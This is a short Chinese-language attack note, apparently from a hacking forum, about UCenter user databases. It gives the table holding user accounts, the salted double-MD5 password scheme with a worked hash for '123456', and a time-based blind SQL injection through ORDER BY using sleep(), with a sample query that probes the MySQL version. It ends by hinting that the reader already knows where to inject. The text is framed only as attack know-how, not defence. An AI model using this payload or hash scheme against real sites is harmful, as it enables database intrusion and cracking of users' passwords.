用户数据存放在UCenter members表

salt随机6位

hashpass=MD5(MD5(realpass)+salt)

如:224e8e993c1e2437c76f12348e9ae44c=MD5(MD5(123456)+29e5c0)

Order By的注射使用sleep().保证查询数据两条以上(基本算废话,不然排序不执行)

SELECT * FROM uc_members order by if(left(version(),1)=5,sleep(5),1)

至于地方,哥你懂的.